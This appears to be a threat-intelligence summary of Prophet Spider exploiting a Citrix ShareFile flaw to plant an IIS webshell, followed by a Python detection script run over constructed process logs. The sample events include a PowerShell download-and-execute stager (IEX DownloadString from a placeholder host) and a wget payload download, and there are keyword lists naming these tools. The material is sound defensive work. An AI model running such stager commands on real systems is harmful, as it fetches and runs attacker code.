Prophet Spider Exploits CVE-2021-22941
Industry: N/A | Level: Tactical | Source: CrowdStrike
CrowdStrike intelligence details a recent intrusion by the threat group Prophet Spider. The adversary exploited CVE-2021-22941, a remote code execution (RCE) vulnerability in Citrix ShareFile Storage Zones Controller, to compromise a Microsoft Internet Information Services (IIS) web server. "From the exploit, the threat actors were able to upload a webshell to the IIS server." After gaining access, the attacker verified connectivity with nslookup and used PowerShell with encoded commands and Invoke-Expression to download additional files. The group's preference for downloading and using the wget utility has been observed across multiple operations.
- Anvilogic Scenario: Prophet Spider - Initial Setup Activity
- Anvilogic Use Cases:
  - Web Application File Upload
  - Common Reconnaissance Commands
  - Common Application Security Testing Tools
  - Encoded Powershell Command
  - Executable File Written to Disk
  - Invoke-WebRequest Command
  - Invoke-Expression Command
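The chain in the summary above (IIS worker spawning a shell, nslookup connectivity check, encoded PowerShell that downloads and Invoke-Expressions a stager, wget dropped and run) maps onto several of the listed use cases. The script below is an added example of that detection logic run over constructed process-creation events; it is not CrowdStrike's report data or Anvilogic's detection content. The events are JSON lines in a Sysmon Event ID 1 style shape (ParentImage, Image, CommandLine), the paths and the 203.0.113.10 address are placeholders, and the encoded sample is built in the script with the same base64-of-UTF-16LE encoding that `powershell.exe -EncodedCommand` expects.

```python
"""Added example: flag the Prophet Spider post-exploitation chain in process-creation logs.

Not CrowdStrike's or Anvilogic's content. Log lines are constructed; hosts, paths and
203.0.113.10 are placeholders.
"""
import base64
import json
import re

IIS_WORKER = "w3wp.exe"                                  # IIS worker process that hosts a webshell
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON = {"nslookup.exe", "whoami.exe", "ipconfig.exe"}   # connectivity / discovery checks
DOWNLOADERS = {"wget.exe", "curl.exe", "certutil.exe"}   # stand-alone download utilities

# -EncodedCommand and the unambiguous prefixes PowerShell accepts for it, then a base64 blob.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)
# Download-and-execute primitives worth flagging once the command is decoded.
SUSPICIOUS_PS = re.compile(
    r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile|wget|curl)\b"
)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def encode_powershell(script):
    """Encode a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script from an -enc style command line, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # bad base64 / odd byte count: not a real -enc blob
        return None


def analyze(event):
    """Return the list of findings for one process-creation event (empty if nothing matched)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if parent == IIS_WORKER and image in SHELLS:
        hits.append("webshell: IIS worker process spawned a shell")
    if image in RECON:
        hits.append(f"recon: {image}")
    if image in DOWNLOADERS:
        hits.append(f"download utility: {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits.append("encoded PowerShell command")
            # dict.fromkeys keeps first-seen order while de-duplicating keywords
            for kw in dict.fromkeys(k.lower() for k in SUSPICIOUS_PS.findall(decoded)):
                hits.append(f"decoded PowerShell uses {kw}")
    return hits


def scan(lines):
    """Run analyze() over JSON log lines; return [(line_index, findings)] for lines with findings."""
    results = []
    for i, line in enumerate(lines):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than stop the pipeline
        hits = analyze(event)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"
SAMPLE_LOG = [
    json.dumps({"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
                "Image": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "cmd.exe /c nslookup www.example.com"}),
    json.dumps({"ParentImage": r"C:\Windows\System32\cmd.exe",
                "Image": r"C:\Windows\System32\nslookup.exe",
                "CommandLine": "nslookup www.example.com"}),
    json.dumps({"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)}),
    json.dumps({"ParentImage": r"C:\Windows\System32\cmd.exe",
                "Image": r"C:\Windows\Temp\wget.exe",
                "CommandLine": r"wget.exe http://203.0.113.10/payload.exe -O C:\Windows\Temp\p.exe"}),
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe",   # benign: interactive PowerShell
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe -Command Get-Date"}),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG):
        print(f"line {idx}: " + "; ".join(findings))
```

The decode step matters: a rule that only matches `-enc` fires on every encoded command, while decoding the blob lets the same rule tell a benign scheduled task from a command that pulls and runs a remote stager. The parent-process check (w3wp.exe spawning cmd.exe or powershell.exe) is the higher-fidelity signal here, since a healthy IIS worker has no reason to launch a shell.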